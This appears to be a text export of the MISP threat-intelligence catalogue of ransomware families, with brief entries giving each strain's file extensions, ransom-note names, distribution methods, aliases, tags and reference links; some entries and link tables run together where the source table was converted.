The Scarab ransomware is a relatively new ransomware strain that was first spotted by security researcher Michael Gillespie in June this year. Written in Delphi, the first version was simplistic and was recognizable via the ".scarab" extension it appended after the names of encrypted files. Malwarebytes researcher Marcelo Rivera spotted a second version in July that used the ".scorpio" extension. The version spotted with the Necurs spam today has reverted back to using the .scarab extension. The current version of Scarab encrypts files but does not change original file names as previous versions. This Scarab version appends each file's name with the "[support@protonmail.com].scarab" extension. Scarab also deletes shadow volume copies and drops a ransom note named "IF YOU WANT TO GET ALL YOUR FILES BACK, PLEASE READ THIS.TXT" on users' computers, which it opens immediately.

The tag is: misp-galaxy:ransomware="Scarab"
A new ransomware called File Spider is being distributed through spam that targets victims in Bosnia and Herzegovina, Serbia, and Croatia. These spam emails contain malicious Word documents that will download and install the File Spider ransomware onto a victim's computer. File Spider is currently being distributed through malspam that appears to be targeting countries such as Croatia, Bosnia and Herzegovina, and Serbia. The spam starts with subjects like "Potrazivanje dugovanja", which translates to "Debt Collection" and whose message, according to Google Translate, appears to be in Serbian.

The tag is: *misp-galaxy:ransomware*="File Spider"

File Spider is also known as:

- Spider

Table 5492. Table References

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**FileCoder**

A barely functional piece of macOS ransomware, written in Swift.

The tag is: `misp-galaxy:ransomware="FileCoder"`

FileCoder is also known as:

- FindZip
- Patcher

FileCoder has relationships with:

- similar: `misp-galaxy:ransomware="Patcher"` with estimative-language:likelihood-probability="likely"
- similar: `misp-galaxy:malpedia="Patcher"` with estimative-language:likelihood-probability="likely"

*Table 5493. Table References*

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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html#FileCoder">https://objective-see.com/blog/blog_0x25.html#FileCoder</a></td>
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</table>

**MacRansom**

A basic piece of macOS ransomware, offered via a 'malware-as-a-service' model.

The tag is: `misp-galaxy:ransomware="MacRansom"`

MacRansom has relationships with:

- similar: `misp-galaxy:malpedia="MacRansom"` with estimative-language:likelihood-probability="likely"

*Table 5494. Table References*

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<tr>
<td><a href="https://objective-see.com/blog/blog_0x25.html">https://objective-see.com/blog/blog_0x25.html</a></td>
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**GandCrab**

A new ransomware called GandCrab was released towards the end of last week that is currently being distributed via exploit kits. GandCrab has some interesting features not seen before in a ransomware, such as being the first to accept the DASH currency and the first to utilize the Namecoin powered .BIT tld.

The tag is: `misp-galaxy:ransomware="GandCrab"`

GandCrab has relationships with:
Security researchers uncovered a new ransomware named ShurL0ckr (detected by Trend Micro as RANSOM_GOSHIFR.B) that reportedly bypasses detection mechanisms of cloud platforms. Like Cerber and Satan, ShurL0ckr's operators further monetize the ransomware by peddling it as a turnkey service to fellow cybercriminals, allowing them to earn additional income through a commission from each victim who pays the ransom.

The tag is: *misp-galaxy:ransomware="ShurL0ckr"*

**Cryakl**

ransomware

The tag is: *misp-galaxy:ransomware="Cryakl"*

Cryakl has relationships with:

- similar: *misp-galaxy:ransomware="Offline ransomware"* with estimative-language:likelihood-probability="likely"
Thanatos

First ransomware seen to ask for payment to be made in Bitcoin Cash (BCH)

The tag is: `misp-galaxy:ransomware="Thanatos"`

Thanatos has relationships with:

- similar: `misp-galaxy:malpedia="Thanatos"` with `estimative-language:likelihood-probability="likely"`

RSAUtil

RSAUtil is distributed by the developer hacking into remote desktop services and uploading a package of files. This package contains a variety of tools, a config file that determines how the ransomware executes, and the ransomware itself.

The tag is: `misp-galaxy:ransomware="RSAUtil"`

RSAUtil is also known as:

- Vagger
- DONTSLIP

Table 5498. Table References

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<tr>
<td><a href="https://mobile.twitter.com/EclecticIQ/status/968478323889332226">https://mobile.twitter.com/EclecticIQ/status/968478323889332226</a></td>
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<td><a href="http://id-ransomware.blogspot.com/2018/02/thanatos-ransomware.html">http://id-ransomware.blogspot.com/2018/02/thanatos-ransomware.html</a></td>
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<tr>
<td><a href="https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks">https://www.securityweek.com/rsautil-ransomware-distributed-rdp-attacks</a></td>
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</table>
Qwerty Ransomware

A new ransomware has been discovered that utilizes the legitimate GnuPG, or GPG, encryption program to encrypt a victim's files. Currently in the wild, this ransomware is called Qwerty Ransomware and will encrypt a victim's files, overwrite the originals, and append the .qwerty extension to an encrypted file's name.

The tag is: misp-galaxy:ransomware="Qwerty Ransomware"

Table 5500. Table References

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Zenis Ransomware

A new ransomware was discovered this week by MalwareHunterTeam called Zenis Ransomware. While it is currently unknown how Zenis is being distributed, multiple victims have already become infected with this ransomware. What is most disturbing about Zenis is that it not encrypts your files, but also purposely deletes your backups.

The tag is: misp-galaxy:ransomware="Zenis Ransomware"

Table 5501. Table References

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<td><a href="https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html">https://id-ransomware.blogspot.com/2018/03/zenis-ransomware.html</a></td>
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Flotera Ransomware

The tag is: misp-galaxy:ransomware="Flotera Ransomware"

Table 5502. Table References

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<td><a href="http://id-ransomware.blogspot.com/2017/03/flotera-ransomware.html">http://id-ransomware.blogspot.com/2017/03/flotera-ransomware.html</a></td>
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**Black Ruby**

A new ransomware was discovered this week by MalwareHunterTeam called Black Ruby. This ransomware will encrypt the files on a computer, scramble the file name, and then append the BlackRuby extension. To make matters worse, Black Ruby will also install a Monero miner on the computer that utilizes as much of the CPU as it can. Discovered on February 6, 2018. May have been distributed through unknown vectors. Will not encrypt a machine if its IP address is identified as coming from Iran; this feature enables actors to avoid a particular Iranian cybercrime law that prohibits Iran-based actors from attacking Iranian victims. Encrypts files on the infected machine, scrambles files, and appends the .BlackRuby extension to them. Installs a Monero miner on the infected computer that utilizes the machine's maximum CPU power. Delivers a ransom note in English asking for US$650 in Bitcoins. Might be installed via Remote Desktop Services.

The tag is: *misp-galaxy:ransomware*="Black Ruby"

Black Ruby is also known as:

- BlackRuby

**Table 5503. Table References**

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**WhiteRose**

A new ransomware has been discovered by MalwareHunterTeam that is based off of the InfiniteTear ransomware family, of which BlackRuby and Zenis are members. When this ransomware infects a computer it will encrypt the files, scramble the filenames, and append the .WHITEROSE extension to them.

The tag is: *misp-galaxy:ransomware*="WhiteRose"

**Table 5504. Table References**

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**PUBG Ransomware**

In what could only be a joke, a new ransomware has been discovered called "PUBG Ransomware"
that will decrypt your files if you play the game called PlayerUnknown's Battlegrounds. Discovered by MalwareHunterTeam, when the PUBG Ransomware is launched it will encrypt a user's files and folders on the user's desktop and append the .PUBG extension to them. When it has finished encrypting the files, it will display a screen giving you two methods that you can use to decrypt the encrypted files.

The tag is: *misp-galaxy:ransomware=*"PUBG Ransomware"

---

**LockCrypt**

LockCrypt is an example of yet another simple ransomware created and used by unsophisticated attackers. Its authors ignored well-known guidelines about the proper use of cryptography. The internal structure of the application is also unprofessional. Sloppy, unprofessional code is pretty commonplace when ransomware is created for manual distribution. Authors don't take much time preparing the attack or the payload. Instead, they're rather focused on a fast and easy gain, rather than on creating something for the long run. Because of this, they could easily be defeated.

The tag is: *misp-galaxy:ransomware=*"LockCrypt"

---

**Magniber Ransomware**

Magniber is a new ransomware being distributed by the Magnitude Exploit Kit that appears to be the successor to the Cerber Ransomware. While many aspects of the Magniber Ransomware are different than Cerber, the payment system and the files it encrypts are very similar.

The tag is: *misp-galaxy:ransomware=*"Magniber Ransomware"
Vurten

The tag is: *misp-galaxy:ransomware*="Vurten"

Table 5508. Table References

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<td><a href="https://twitter.com/siri">https://twitter.com/siri</a>_ urz/status/981191281195044867</td>
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Reveton ransomware

A ransomware family that targets users from certain countries or regions. It locks the computer and displays a location-specific webpage that covers the desktop and demands that the user pay a fine for the supposed possession of illicit material. The Reveton ransomware is one of the first screen-locking ransomware strains, and it appeared when Bitcoin was still in its infancy, and before it became the cryptocurrency of choice in all ransomware operations. Instead, Reveton operators asked victims to buy GreenDot MoneyPak vouchers, take the code on the voucher and enter it in the Reveton screen locker.

The tag is: *misp-galaxy:ransomware*="Reveton ransomware"

Table 5509. Table References

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<tr>
<td><a href="https://en.wikipedia.org/wiki/Ransomware#Reveton">https://en.wikipedia.org/wiki/Ransomware#Reveton</a></td>
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Fusob

Fusob is one of the major mobile ransomware families. Between April 2015 and March 2016, about 56 percent of accounted mobile ransomware was Fusob. Like a typical mobile ransomware, it employs scare tactics to extort people to pay a ransom. The program pretends to be an accusatory authority, demanding the victim to pay a fine from $100 to $200 USD or otherwise face a fictitious charge. Rather surprisingly, Fusob suggests using iTunes gift cards for payment. Also, a timer clicking down on the screen adds to the users’ anxiety as well. In order to infect devices, Fusob
masquerades as a pornographic video player. Thus, victims, thinking it is harmless, unwittingly download Fusob. When Fusob is installed, it first checks the language used in the device. If it uses Russian or certain Eastern European languages, Fusob does nothing. Otherwise, it proceeds on to lock the device and demand ransom. Among victims, about 40% of them are in Germany with the United Kingdom and the United States following with 14.5% and 11.4% respectively. Fusob has lots in common with Small, which is another major family of mobile ransomware. They represented over 93% of mobile ransoms between 2015 and 2016.

The tag is: misp-galaxy:ransomware="Fusob"

Table 5510. Table References

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<td><a href="https://en.wikipedia.org/wiki/Ransomware#Fusob">https://en.wikipedia.org/wiki/Ransomware#Fusob</a></td>
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</table>

**OXAR**

The tag is: misp-galaxy:ransomware="OXAR"

Table 5511. Table References

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</table>

**BansomQare Manna Ransomware**

The tag is: misp-galaxy:ransomware="BansomQare Manna Ransomware"

Table 5512. Table References

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<tr>
<td><a href="http://id-ransomware.blogspot.com/2018/03/bansomqarewanna-ransomware.html">http://id-ransomware.blogspot.com/2018/03/bansomqarewanna-ransomware.html</a></td>
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</table>

**Haxerboi Ransomware**

The tag is: misp-galaxy:ransomware="Haxerboi Ransomware"

**SkyFile**

The tag is: misp-galaxy:ransomware="SkyFile"

Table 5513. Table References

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</table>
MC Ransomware

Supposed joke ransomware, decrypt when running an executable with the string "Minecraft"

The tag is: misp-galaxy:ransomware="MC Ransomware"

Table 5514. Table References

Links


CSGO Ransomware

Supposed joke ransomware, decrypt when running an executable with the string "csgo"

The tag is: misp-galaxy:ransomware="CSGO Ransomware"

Table 5515. Table References

Links


XiaoBa ransomware

The tag is: misp-galaxy:ransomware="XiaoBa ransomware"

Table 5516. Table References

Links

https://twitter.com/malwrhunterteam/status/923847744137154560
https://twitter.com/struppigel/status/926748937477939200
https://twitter.com/demonslay335/status/968552114787151873
https://twitter.com/malwrhunterteam/status/1004048636530094081
https://id-ransomware.blogspot.com/2017/10/xiaoba-ransomware.html

NMCRYPT Ransomware

The NMCRYPT Ransomware is a generic file encryption Trojan that was detected in the middle of April 2018. The NMCRYPT Ransomware is a file encoder Trojan that is designed to make data
unreadable and convince users to pay a fee for unlocking content on the infected computers. The NMCRYPT Ransomware is nearly identical to hundreds of variants of the HiddenTear open-source ransomware and compromised users are unable to use the Shadow Volume snapshots made by Windows to recover. Unfortunately, the NMCRYPT Ransomware disables the native recovery features on Windows, and you need third-party applications to rebuild your data.

The tag is: `misp-galaxy:ransomware="NMCRYPT Ransomware"`

**Table 5517. Table References**

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**Iron**

It is currently unknown if Iron is indeed a new variant by the same creators of Maktub, or if it was simply inspired by the latter, by copying the design for the payment portal for example. We know the Iron ransomware has mimicked at least three ransomware families: Maktub (payment portal design) DMA Locker (Iron Unlocker, decryption tool) Satan (exclusion list)

The tag is: `misp-galaxy:ransomware="Iron"`

**Table 5518. Table References**

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**Tron ransomware**

The tag is: `misp-galaxy:ransomware="Tron ransomware"`

**Table 5519. Table References**

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**Unnamed ransomware 1**

A new in-development ransomware was discovered that has an interesting characteristic. Instead of the distributed executable performing the ransomware functionality, the executables compiles an embedded encrypted C# program at runtime and launches it directly into memory.

The tag is: `misp-galaxy:ransomware="Unnamed ransomware 1"`
HPE iLO 4 Ransomware

Attackers are targeting Internet accessible HPE iLO 4 remote management interfaces, supposedly encrypting the hard drives, and then demanding Bitcoins to get access to the data again. According to the victim, the attackers are demanding 2 bitcoins to gain access to the drives again. The attackers will also provide a bitcoin address to the victim that should be used for payment. These bitcoin addresses appear to be unique per victim as the victim's was different from other reported ones. An interesting part of the ransom note is that the attackers state that the ransom price is not negotiable unless the victim's are from Russia. This is common for Russian based attackers, who in many cases tries to avoid infecting Russian victims. Finally, could this be a decoy/wiper rather than an actual true ransomware attack? Ransomware attacks typically provide a unique ID to the victim in order to distinguish one victim from another. This prevents a victim from "stealing" another victim's payment and using it to unlock their computer. In a situation like this, where no unique ID is given to identify the encrypted computer and the email is publicly accessible, it could be a case where the main goal is to wipe a server or act as a decoy for another attack.

The tag is: misp-galaxy:ransomware="HPE iLO 4 Ransomware"

Sigrun Ransomware

When Sigrun is executed it will first check "HKEY_CURRENT_USER\Keyboard Layout\Preload" to see if it is set to the Russian layout. If the computer is using a Russian layout, it will not encrypt the computer and just delete itself. Otherwise Sigrun will scan a computer for files to encrypt and skip any that match certain extensions, filenames, or are located in particular folders.

The tag is: misp-galaxy:ransomware="Sigrun Ransomware"
**CryBrazil**

Mostly Hidden Tear with some codes from Eda2 & seems compiled w/ Italian VS. Maybe related to OpsVenezuela?

The tag is: `misp-galaxy:ransomware="CryBrazil"`

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<td><a href="https://id-ransomware.blogspot.com/2018/06/crybrazil-ransomware.html">https://id-ransomware.blogspot.com/2018/06/crybrazil-ransomware.html</a></td>
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</table>

**Pedcont**

new destructive ransomware called Pedcont that claims to encrypt files because the victim has accessed illegal content on the deep web. The screen then goes blank and becomes unresponsive.

The tag is: `misp-galaxy:ransomware="Pedcont"`

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<th>Table 5524. Table References</th>
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<td><a href="http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html">http://id-ransomware.blogspot.com/2018/06/pedcont-ransomware.html</a></td>
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</table>

**DiskDoctor**

new Scarab Ransomware variant called DiskDoctor that appends the .DiskDoctor extension and drops a ransom note named HOW TO RECOVER ENCRYPTED FILES.TXT

The tag is: `misp-galaxy:ransomware="DiskDoctor"`

DiskDoctor is also known as:

- Scarab-DiskDoctor

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<th>Table 5525. Table References</th>
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<td><a href="https://id-ransomware.blogspot.com/2018/06/scarab-diskdoctor-ransomware.html">https://id-ransomware.blogspot.com/2018/06/scarab-diskdoctor-ransomware.html</a></td>
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</table>
**RedEye**

Jakub Kroustek discovered the RedEye Ransomware, which appends the .RedEye extension and wipes the contents of the files. RedEye can also rewrite the MBR with a screen that gives authors contact info and YouTube channel. Bart also wrote an article on this ransomware detailing how it works and what it does on a system. The ransomware author contacted BleepingComputer and told us that this ransomware was never intended for distribution and was created just for fun.

The tag is: `misp-galaxy:ransomware="RedEye"`

**Table 5526. Table References**

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<td><a href="https://bartblaze.blogspot.com/2018/06/redeye-ransomware-theres-more-than.html">https://bartblaze.blogspot.com/2018/06/redeye-ransomware-theres-more-than.html</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2018/06/redeye-ransomware.html">https://id-ransomware.blogspot.com/2018/06/redeye-ransomware.html</a></td>
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**Aurora Ransomware**

Typical ransom software, Aurora virus plays the role of blackmailing PC operators. It encrypts files and the encryption cipher it uses is pretty strong. After encryption, the virus attaches .aurora at the end of the file names that makes it impossible to open the data. Thereafter, it dispatches the ransom note totaling 6 copies, without any change to the main objective i.e., victims must write an electronic mail addressed to anonimus.mr@yahoo.com while stay connected until the criminals reply telling the ransom amount.

The tag is: `misp-galaxy:ransomware="Aurora Ransomware"`

Aurora Ransomware is also known as:

- Zorro Ransomware

**Table 5527. Table References**

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<td><a href="https://twitter.com/demonslay335/status/1004435398687379456">https://twitter.com/demonslay335/status/1004435398687379456</a></td>
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<td><a href="https://id-ransomware.blogspot.com/2018/05/aurora-ransomware.html">https://id-ransomware.blogspot.com/2018/05/aurora-ransomware.html</a></td>
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PGPSnippet Ransomware

The tag is: misp-galaxy:ransomware="PGPSnippet Ransomware"

Table 5528. Table References

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Spartacus Ransomware

The tag is: misp-galaxy:ransomware="Spartacus Ransomware"

Table 5529. Table References

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</table>

Donut

S!Ri found a new ransomware called Donut that appends the .donut extension and uses the email donutmmmm@tutanota.com.

The tag is: misp-galaxy:ransomware="Donut"

Table 5530. Table References

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<td><a href="https://twitter.com/siri_urz/status/1005438610806583296">https://twitter.com/siri_urz/status/1005438610806583296</a></td>
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<td><a href="http://id-ransomware.blogspot.com/2018/06/donut-ransomware.html">http://id-ransomware.blogspot.com/2018/06/donut-ransomware.html</a></td>
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NemeS1S Ransomware

Ransomware as a Service

The tag is: misp-galaxy:ransomware="NemeS1S Ransomware"

Table 5531. Table References

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<tr>
<td><a href="https://twitter.com/Damian1338B/status/1005411102660923392">https://twitter.com/Damian1338B/status/1005411102660923392</a></td>
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</tbody>
</table>
Paradise Ransomware

MalwareHunterTeam discovered a new Paradise Ransomware variant that uses the extension _V.0.0.0.1{paradise@all-ransomware.info}.prt and drops a ransom note named PARADISE_README_paradise@all-ransomware.info.txt.

The tag is: misp-galaxy:ransomware="Paradise Ransomware"

Table 5532. Table References

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B2DR Ransomware

uses the .reycarnasi1983@protonmail.com.gw3w amd a ransom note named ScrewYou.txt

The tag is: misp-galaxy:ransomware="B2DR Ransomware"

Table 5533. Table References

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YYTO Ransomware

uses the extension .codyprince92@mail.com.ovgm and drops a ransom note named Readme.txt

The tag is: misp-galaxy:ransomware="YYTO Ransomware"

Table 5534. Table References

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Unnamed ramsomware 2

The tag is: misp-galaxy:ransomware="Unnamed ramsomware 2"

Table 5535. Table References
**Everbe Ransomware**

The tag is: `misp-galaxy:ransomware="Everbe Ransomware"`

**Table 5536. Table References**

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</table>

**DirCrypt**

The tag is: `misp-galaxy:ransomware="DirCrypt"`

DirCrypt has relationships with:

- similar: `misp-galaxy:malpedia="DirCrypt"` with `estimative-language:likelihood-probability="likely"`

**Table 5537. Table References**

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<td><a href="https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/">https://www.johannesbader.ch/2015/03/the-dga-of-dircrypt/</a></td>
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**DBGer Ransomware**

The authors of the Satan ransomware have rebranded their "product" and they now go by the name of DBGer ransomware, according to security researcher MalwareHunter, who spotted this new version earlier today. The change was not only in name but also in the ransomware's modus operandi. According to the researcher, whose discovery was later confirmed by an Intezer code similarity analysis, the new (Satan) DBGer ransomware now also incorporates Mimikatz, an open-source password-dumping utility. The purpose of DBGer incorporating Mimikatz is for lateral movement inside compromised networks. This fits a recently observed trend in Satan's modus operandi.

The tag is: `misp-galaxy:ransomware="DBGer Ransomware"`

**Table 5538. Table References**

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RASTAKHIZ

Hidden Tear variant discovered in October 2016. After activation, provides victims with an unlimited amount of time to gather the requested ransom money and pay it. Related unlock keys and the response sent to and from a Gmail address.

The tag is: misp-galaxy:ransomware="RASTAKHIZ"

Table 5539. Table References

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<td><a href="http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html">http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html</a></td>
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TYRANT

DUMB variant discovered on November 16, 2017. Disguised itself as a popular virtual private network (VPN) in Iran known as Psiphon and infected Iranian users. Included Farsi-language ransom note, decryptable in the same way as previous DUMB-based variants. Message requested only US$15 for unlock key. Advertised two local and Iran-based payment processors: exchange.ir and webmoney.ir. Shared unique and specialized indicators with RASTAKHIZ; iDefense threat intelligence analysts believe this similarity confirms that the same actor was behind the repurposing of both types of ransomware.

The tag is: misp-galaxy:ransomware="TYRANT"

TYRANT is also known as:

- Crypto Tyrant

Table 5540. Table References

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<td><a href="http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html">http://id-ransomware.blogspot.com/2018/06/dbger-ransomware.html</a></td>
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WannaSmile

zCrypt variant discovered on November 17, 2017, one day after the discovery of TYRANT. Used Farsi-language ransom note asking for a staggering 20 Bitcoin ransom payment. Also advertised local Iran-based payment processors and exchanges—www.exchangeing[.]ir, www.payment24[.]ir, www.farhadexchange.net, and www.digiarz.com)—through which Bitcoins could be acquired.

The tag is: *misp-galaxy:ransomware="WannaSmile"

Table 5541. Table References

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Unnamed Android Ransomware

Uses APK Editor Pro. Picks and activates DEX>Smali from APK Editor. Utilizes LockService application and edits the “const-string v4, value” to a desired unlock key. Changes contact information within the ransom note. Once the victim has downloaded the malicious app, the only way to recover its content is to pay the ransom and receive the unlock key.

The tag is: *misp-galaxy:ransomware="Unnamed Android Ransomware"

Table 5542. Table References

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KEYPASS

A new distribution campaign is underway for a STOP Ransomware variant called KeyPass based on the amount of victims that have been seen. Unfortunately, how the ransomware is being distributed is unknown at this time.

The tag is: *misp-galaxy:ransomware="KEYPASS"

KEYPASS is also known as:

- KeyPass

Table 5543. Table References

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STOP Ransomware

Emmanuel_ADC-Soft found a new STOP Ransomware variant that appends the .INFOWAIT extension and drops a ransom note named !readme.txt.

The tag is: `misp-galaxy:ransomware="STOP Ransomware"`

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware

A new ransomware that only encrypts .EXE files on a computer. It then displays a screen with a picture of President Obama that asks for a "tip" to decrypt the files.

The tag is: `misp-galaxy:ransomware="Barack Obama's Everlasting Blue Blackmail Virus Ransomware"`

Barack Obama’s Everlasting Blue Blackmail Virus Ransomware is also known as:

- Barack Obama’s Blackmail Virus Ransomware

CryptoNar

When the CryptoNar, or Crypto Nar, Ransomware encrypts a victims files it will perform the encryption differently depending on the type of file being encrypted. If the targeted file has a .txt or
.md extension, it will encrypt the entire file and append the .fully.cryptoNar extension to the encrypted file’s name. All other files will only have the first 1,024 bytes encrypted and will have the .partially.cryptoNar extensions appended to the file’s name.

The tag is: `misp-galaxy:ransomware="CryptoNar"`

CryptoNar has relationships with:

- similar: `misp-galaxy:ransomware="CryptoJoker"` with `estimative-language:likelihood-probability="likely"

---

## CreamPie Ransomware

Jakub Kroustek found what appears to be an in-dev version of the CreamPie Ransomware. It does not currently display a ransom note, but does encrypt files and appends the `backdata@cock.li`.CreamPie extension to them.

The tag is: `misp-galaxy:ransomware="CreamPie Ransomware"

---

## Jeff the Ransomware

Looks to be in-development as it does not encrypt.

The tag is: `misp-galaxy:ransomware="Jeff the Ransomware"`
Cassette Ransomware

Michael Gillespie saw an encrypted file uploaded to ID Ransomware that appends the .cassetto extension and drops a ransom note named IMPORTANT ABOUT DECRYPT.txt.

The tag is: misp-galaxy:ransomware="Cassette Ransomware"

Table 5549. Table References

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</table>

Acroware Cryptolocker Ransomware

Leo discovered a screenlocker that calls itself Acroware Cryptolocker Ransomware. It does not encrypt.

The tag is: misp-galaxy:ransomware="Acroware Cryptolocker Ransomware"

Acroware Cryptolocker Ransomware is also known as:

- Acroware Screenlocker

Table 5550. Table References

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Termite Ransomware

Ben Hunter discovered a new ransomware called Termite Ransomware. When encrypting a computer it will append the .aaaaa extension to encrypted files.

The tag is: misp-galaxy:ransomware="Termite Ransomware"

Table 5551. Table References

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<td><a href="https://twitter.com/B_H101/status/1034379267956715520">https://twitter.com/B_H101/status/1034379267956715520</a></td>
</tr>
</tbody>
</table>
PICO Ransomware

S!Ri found a new Thanatos Ransomware variant called PICO Ransomware. This ransomware will append the .PICO extension to encrypted files and drop a ransom note named README.txt.

The tag is: `misp-galaxy:ransomware="PICO Ransomware"`

PICO Ransomware is also known as:

- Pico Ransomware

Table 5552. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</thead>
<tbody>
<tr>
<td><a href="https://twitter.com/siri">https://twitter.com/siri</a>_ urz/status/1035138577934557184</td>
</tr>
</tbody>
</table>

Sigma Ransomware

Today one of our volunteers, Aura, told me about a new new malspam campaign pretending to be from Craigslist that is under way and distributing the Sigma Ransomware. These spam emails contain password protected Word or RTF documents that download the Sigma Ransomware executable from a remote site and install it on a recipients computer.

The tag is: `misp-galaxy:ransomware="Sigma Ransomware"`

Table 5553. Table References

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<th>Links</th>
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</table>

Crypt0saur

The tag is: `misp-galaxy:ransomware="Crypt0saur"`

Mongo Lock

An attack called Mongo Lock is targeting remotely accessible and unprotected MongoDB databases, wiping them, and then demanding a ransom in order to get the contents back. While this new campaign is using a name to identify itself, these types of attacks are not new and MongoDB databases have been targeted for a while now. These hijacks work by attackers scanning the Internet or using services such as Shodan.io to search for unprotected MongoDB servers. Once connected, the attackers may export the databases, delete them, and then create a ransom note explaining how to get the databases back.

The tag is: `misp-galaxy:ransomware="Mongo Lock"`
Kraken Cryptor Ransomware

The Kraken Cryptor Ransomware is a newer ransomware that was released in August 2018. A new version, called Kraken Cryptor 1.5, was recently released that is masquerading as the legitimate SuperAntiSpyware anti-malware program in order to trick users into installing it.

The tag is: `misp-galaxy:ransomware="Kraken Cryptor Ransomware"`

SAVEfiles

The tag is: `misp-galaxy:ransomware="SAVEfiles"`

File-Locker

The File-Locker Ransomware is a Hidden Tear variant that is targeting victims in Korea. When victim's are infected it will leave a ransom requesting 50,000 Won, or approximately 50 USD, to get the files back. This ransomware uses AES encryption with a static password of "dnwls07193147", so it is easily decryptable.

The tag is: `misp-galaxy:ransomware="File-Locker"`
CommonRansom

A new ransomware called CommonRansom was discovered that has a very bizarre request. In order to decrypt a computer after a payment is made, they require the victim to open up Remote Desktop Services on the affected computer and send them admin credentials in order to decrypt the victim’s files.

The tag is: misp-galaxy:ransomware="CommonRansom"

Table 5558. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>

God Crypt Joke Ransomware

MalwareHunterTeam found a new ransomware called God Crypt that does not appear to decrypt and appears to be a joke ransomware. Has an unlock code of 29b579fb811f05c3c334a2bd2646a27a.

The tag is: misp-galaxy:ransomware="God Crypt Joke Ransomware"

God Crypt Joke Ransomware is also known as:

- Godsomware v1.0
- Ransomware God Crypt

Table 5559. Table References

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/malwrhunterteam/status/1048616343975682048">https://twitter.com/malwrhunterteam/status/1048616343975682048</a></td>
</tr>
</tbody>
</table>

DecryptFox Ransomware

Michael Gillespie found a new ransomware uploaded to ID Ransomware that appends the .encr extension and drops a ransom note named readmy.txt.

The tag is: misp-galaxy:ransomware="DecryptFox Ransomware"

Table 5560. Table References

<table>
<thead>
<tr>
<th>Links</th>
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</table>
**garrantydecrypt**

Michael Gillespie found a new ransomware that appends the `.garrantydecrypt` extension and drops a ransom note named `RECOVERY_FILES.txt`.

The tag is: `misp-galaxy:ransomware="garrantydecrypt"`

*Table 5561. Table References*

<table>
<thead>
<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/1049325784979132417">https://twitter.com/demonslay335/status/1049325784979132417</a></td>
</tr>
</tbody>
</table>

**MVP Ransomware**

Siri discovered a new ransomware that is appending the `.mvp` extension to encrypted files.

The tag is: `misp-galaxy:ransomware="MVP Ransomware"`

*Table 5562. Table References*

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/siri_urz/status/1039077365039673344">https://twitter.com/siri_urz/status/1039077365039673344</a></td>
</tr>
</tbody>
</table>

**StorageCrypter**

Michael Gillespie noticed numerous submissions to ID Ransomware from South Korea for the StorageCrypter ransomware. This version is using a new ransom note named `read_me_for_recover_your_files.txt`.

The tag is: `misp-galaxy:ransomware="StorageCrypter"`

StorageCrypter is also known as:

- SambaCry

*Table 5563. Table References*

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<td>3106</td>
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</table>
Rektware

GrujaRS discovered a new ransomware called Rektware that appends the .CQScSFy extension

The tag is: misp-galaxy:ransomware="Rektware"

M@r1a ransomware

The tag is: misp-galaxy:ransomware="M@r1a ransomware"

M@r1a ransomware is also known as:

- M@r1a
- BlackHeart

"prepending (enc) ransomware" (Not an official name)

The tag is: misp-galaxy:ransomware=""prepending (enc) ransomware" (Not an official name)"

"prepending (enc) ransomware" (Not an official name) is also known as:

- Aperfectday2018
PyCL Ransomware

The tag is: misp-galaxy:ransomware="PyCL Ransomware"

PyCL Ransomware is also known as:

- Dxh26wam

Vapor Ransomware

MalwareHunterTeam discovered the Vapor Ransomware that appends the .Vapor extension to encrypted files. Will delete files if you do not pay in time.

The tag is: misp-galaxy:ransomware="Vapor Ransomware"

EnyBenyHorsuke Ransomware

GrujaRS discovered a new ransomware called EnyBenyHorsuke Ransomware that appends the .Horsuke extension to encrypted files.

The tag is: misp-galaxy:ransomware="EnyBenyHorsuke Ransomware"

DeLpHiMoRix

The tag is: misp-galaxy:ransomware="DeLpHiMoRix"

DeLpHiMoRix is also known as:

- DelphiMorix
• DelphiMorix!

Table 5570. Table References

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<tr>
<th>Links</th>
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<tbody>
<tr>
<td><a href="https://twitter.com/petrovic082/status/1065223932637315074">https://twitter.com/petrovic082/status/1065223932637315074</a></td>
</tr>
<tr>
<td><a href="https://twitter.com/demonslay335/status/1066099799705960448">https://twitter.com/demonslay335/status/1066099799705960448</a></td>
</tr>
</tbody>
</table>

EnyBeny Nuclear Ransomware

@GrujaRS discovered a new in-dev ransomware called EnyBeny Nuclear Ransomware that meant to append the extension .PERSONAL_ID:.Nuclear to encrypted files, but failed due to a bug.

The tag is: misp-galaxy:ransomware="EnyBeny Nuclear Ransomware"

Table 5571. Table References

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<tr>
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<tbody>
<tr>
<td><a href="https://twitter.com/GrujaRS/status/1066799421080461312">https://twitter.com/GrujaRS/status/1066799421080461312</a></td>
</tr>
<tr>
<td><a href="https://www.youtube.com/watch?v=_aaFon7FVbc">https://www.youtube.com/watch?v=_aaFon7FVbc</a></td>
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</table>

Lucky Ransomware

Michael Gillespie discovered a new ransomware that renamed encrypted files to "[original].[random].lucky" and drops a ransom note named How_To_Decrypt_My_File.txt.

The tag is: misp-galaxy:ransomware="Lucky Ransomware"

Table 5572. Table References

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<tbody>
<tr>
<td><a href="https://twitter.com/demonslay335/status/1067109661076262913">https://twitter.com/demonslay335/status/1067109661076262913</a></td>
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</table>

WeChat Ransom

Over 100,000 thousand computers in China have been infected in just a few days with poorly-written ransomware that encrypts local files and steals credentials for multiple Chinese online services. The crooks show a screen titled UNNAMED1989 and demand the victim a ransom of 110 yuan ($16) in exchange for decrypting the files, payable via Tencent's WeChat payment service by scanning a QR code.
The tag is: misp-galaxy:ransomware="WeChat Ransom"

WeChat Ransom is also known as:

- UNNAMED1989

Table 5573. Table References

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</table>

**IsraBye**

The tag is: misp-galaxy:ransomware="IsraBye"

Table 5574. Table References

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<tbody>
